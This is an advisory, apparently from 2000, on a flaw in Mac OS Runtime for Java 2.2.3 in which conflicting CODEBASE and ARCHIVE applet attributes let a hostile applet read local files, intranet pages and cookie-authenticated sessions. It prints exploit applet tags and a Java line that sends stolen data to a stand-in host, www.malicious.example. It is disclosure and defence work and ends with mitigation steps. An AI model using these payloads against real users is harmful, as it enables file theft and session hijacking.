COMMAND
Mac OS Runtime for Java
SYSTEMS AFFECTED
MRJ 2.2.3 (Mac OS Runtime for Java)
PROBLEM
Hiromitsu Takagi found following. Version 2.2.3 of MRJ (Mac OS
Runtime for Java). This has not been confirmed yet, but all
older versions may be affected also. It is also affected that
Web browser for Mac OS, Internet Explorer 4.5 and 5, Netscape 6,
iCab and other software all of which use MRJ.
"MRJ" is installed in all recent Mac OS as a standard provision
and is used in browsing Web pages. This security hole is found
existing in the following combinations:
o Mac OS + MRJ 2.2.3 + Internet Explorer 4.5
o Mac OS + MRJ 2.2.3 + Internet Explorer 5
o Mac OS + MRJ 2.2.3 + Netscape 6
o Mac OS + MRJ 2.2.3 + iCab pre2.2
o Mac OS + MRJ 2.2.3 + Mozilla MRJ Plug-in 1.0b1 + Netscape 4.76
This bug exposes the browsing user to the following damage the
moment he or she accidentally or otherwise browses a page
intentionally set by a malicious Web site operator:
(1) Arbitrary files in the computer of the browsing user will be
stolen.
(2) The browser of the browsing user will be taken over and will
be made to access an arbitrary Web site.
(3) Information in Web pages that is disclosed only to the inside
of the organization (intranet) will be stolen.
A demonstration applet to verify the existence of this bug has
been created:
http://java-house.etl.go.jp/~takagi/java/security/mrj-codebase1/Test.html
Pressing the "Execute" button will output the list of file names
in the volume "Macintosh HD" in the TextArea under. See:
http://java-house.etl.go.jp/~takagi/java/security/mrj-codebase1/fig-1.gif
If Macintosh is used by changing the volume name to other than
"Macintosh HD," which is the default, input the changed name to
the TextField on the left of the "Execute" button and press the
"Execute" button.
Pressing "Send this to the server" button will transfer the data
in the TextArea to the server. The server is configured to
return received data as it is and the data will be displayed on
the browser screen. See Fig. 2.:
http://java-house.etl.go.jp/~takagi/java/security/mrj-codebase1/fig-2.gif
Do not press the "Send this to the server" button unless you wish
data to be transferred. It has been confirmed that file data
will also be read and that connection to any server will be
possible even though this demonstration applet reads only file
names.
The threat brought about by Problem (1) is obvious and does not
have to be explained. The reader is requested to see a document
published earlier, "Danger of Security Defect of Any Host Being
Accessed" on Problem (3):
http://java-house.etl.go.jp/ml/archive/j-h-b/033470.html
The remaining problem, Problem 2), does not seem to be known
fully. As one of the threats brought about by the Brown Orifice
security hole reported in August 2000, this problem has already
been taken up in BugTraq also. Nevertheless, Microsoft's
document MS00-081 fails to mention about this threat. Threat (2)
is explained below.
The threat posed by the bug allowing the Java applet accessing any
host is not confined to information read out only. If the
java.net. URLConnection function supports Cookie, the following
threat will occur.
In case browsers of the browsing users are forcibly accessed by
sites designated by intentions of malicious Web site setters,
such accessing will become accessing based on information
(Cookies) unique to the browser and will be deemed as operation
by the browsing users themselves.
As a result, the browsing users may be penalized as follows:
- Electronic commerce sites using Cookies with an indefinite time
limit will be accessed for authenticattion of the users
themselves and false purchase orders will be issued.
Sites that do not require password input, such as placing orders
by clicking only, may be authenticating the users only by a
Cookie with an indefinite time limit.
- In case the users are authenticated only by a Cookie, even
electronic commerce sites operated by a Cookie that is set with
a term of validity may sometimes issue purchase orders without
inputting a password because a Cookie within this term of
validity is used if they are accessed by sites, which have a
mechanism to abuse this security hole, immediately after
transaction sites are used.
- Among services which authenticate the users by a Cookie with a
set term of validity, those Web mail system services almost
certainly have operations of their Web mail systems taken over
when they receive mail embedded with a malicious applet. As a
result, mail is stolen and is read and false mail is sent by
malicious users who disguise as browsing users.
The reason for "almost certainly" is as follows. The moment a
browsing user accesses an applet, which is a trap, the browsing
user is naturally using the Web mail system and the Cookie for
the Web mail system is always within its term of validity so
that the Web mail is taken over almost certainly.
As a security constraint, the Java applet is designed allowing
information to be read only from the Web site of the party who
originally downloaded the applet program. In Java VM, the site
of the original downloading source is displayed in URL as
"CODEBASE." In the <APPLET> tag, which is used when pasting the
Java applet in a Web page, the original download source of the
applet can be designated by the attribute "CODEBASE." For
example, when
<APPLET CODE="Test" CODEBASE="http://www.target.example/">
is written, the applet program will be downloaded from
http://www.target.example/Test.class
regardless of where HTML written in the tags is located. The
applet is restricted to read only the information of
"www.target.com."
On the other hand, the <APPLET> tag has the attribute "ARCHIVE,"
allowing loading Java applet programs which are archived in the
JAR file. For example, when
<APPLET CODE="Test" ARCHIVE="Test.jar">
is written, the "Test.jar" file that is located in the same
directory as that of the HTML file will be downloaded.
What will happen if both attributes CODEBASE and ARCHIVE are
designated? For example, when
<APPLET CODE="Test"
CODEBASE="http://www.target.example/"
ARCHIVE="http://www.malicious.example/Test.jar">
are described and if an applet program is downloaded from
"www.malicious.example," this applet will be able to read the
information of "www.target.example." If this is the case, a
security problem will arise.
The CODEBASE attribute must be made to be ignored or the applet
must be disabled to start in case these conflicting CODEBASE and
ARCHIVE attributes are designated.
In spite of this, MRJ 2.2.3 safely activates the applet and allows
reading information of the site designated by the CODEBASE
attribute.
By designating "file:///" URL as the CODEBASE attribute, local
files too can be read.
<APPLET CODE="Test"
CODEBASE="file:///"
ARCHIVE="http://www.malicious.example/exploit.jar">
Some of the readers will question; the applet can communicate with
only the hosts of CODEBASE and cannot send the information to a
malicious server even though the applet can read information,
which it should not be allowed to read. However, at least,
information can be transferred by the following method:
String cgi = "http://www.malicious.example/receive-query.cgi";
getAppletContext().showDocument(new URL(cgi + "?" + URLEncoder.encode(data)));
This bug is based on the same theory as that of bug of Windows
Internet Explorer "MS00-81" reported on October 18 2000 by Georgi
Guninski. MS00-081 was a bug that caused the same phenomenon as
that of this bug when an applet is started by the <OBJECT> tag.
The only difference is that the MRJ bug now being discussed is
caused by the <APPLET> tag and not by the <OBJECT> tag.
It was careless on the part of Microsoft that they overlooked the
fact the <OBJECT> tag would have a similar problem when they
fixed this bug of the <APPLET> tag by MS00-001. Be that as it
may, why did not Apple Computer recognize at that time the
possibility of the same problem occurring again with their own
products?
Furthermore, what is surprising is that this bug seemed to have
existed in JDK of Sun Microsystems. This phenomenon is reproduced
when the foregoing demonstration applet for verification is
opened by the appletvirewr of JDK1.1.4. However, it does not
reproduce in JDK 1.1.5. It appears that Sun knew this bug and
fixed it in JDK1.1.5. However, Sun's page summarizing its
history of security problems in the past related to Java does not
describe it. Did Sun notify other Java VM vendors when they
fixed this bug in their JDK 1.1.5? Did any one in Sun notice
that MRJ was not fixed yet?
SOLUTION
Wait until a version of MRJ fixing this bug is released by Apple
Computer and install it. This version has not been released as
of December 14 2000. The latest version of MRJ can be obtained
through the following site: http://www.apple.com/java/
As long as fixed MRJ cannot be obtained, stop the Java functions
of the Web browser.
For Internet Explorer: Select "Preferences" in the "Edit" menu.
Select "Java" and check off the check box "Enable Java."
For Netscape 6: Select "Preferences" in the "Edit" menu. Select
"Advanced" in "Category" on the left and check off the check box
"Enable Java."
For iCab: Select "Preferences" in the "Edit" menu. Select
"Settings / Security" in "Java" and check off the check box
"Execute Java applets."